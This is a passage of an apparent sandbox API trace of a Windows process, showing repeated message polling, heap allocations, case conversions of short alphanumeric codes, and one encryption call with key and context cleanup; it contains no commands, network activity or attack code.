PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.006] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.006] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.006] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.007] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.007] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24db350*, pdwDataLen=0x8bef68*=0x38ea, dwBufLen=0x38f0 | out: pbData=0x24db350*, pdwDataLen=0x8bef68*=0x38f0) returned 1 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.007] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.007] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.008] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.008] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.008] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.013] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.013] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.013] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.013] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.013] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.013] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.013] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.013] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.014] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.014] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.014] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.014] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.015] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0200.016] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.016] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0200.016] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.016] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.016] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.016] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.016] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.017] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.017] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0200.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.017] CryptDestroyKey (hKey=0xaa58a0) returned 1 [0200.017] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.017] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.017] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.017] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.017] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.017] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.017] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.017] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.017] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.017] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.017] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.017] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.018] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.018] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.018] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.018] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0200.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.018] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0200.018] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.018] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0200.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.019] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0200.019] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.019] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0200.019] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.019] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.019] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.019] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.020] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.020] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0200.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.023] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0200.023] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.023] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.024] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.024] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.024] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.025] RtlAllocateHeap 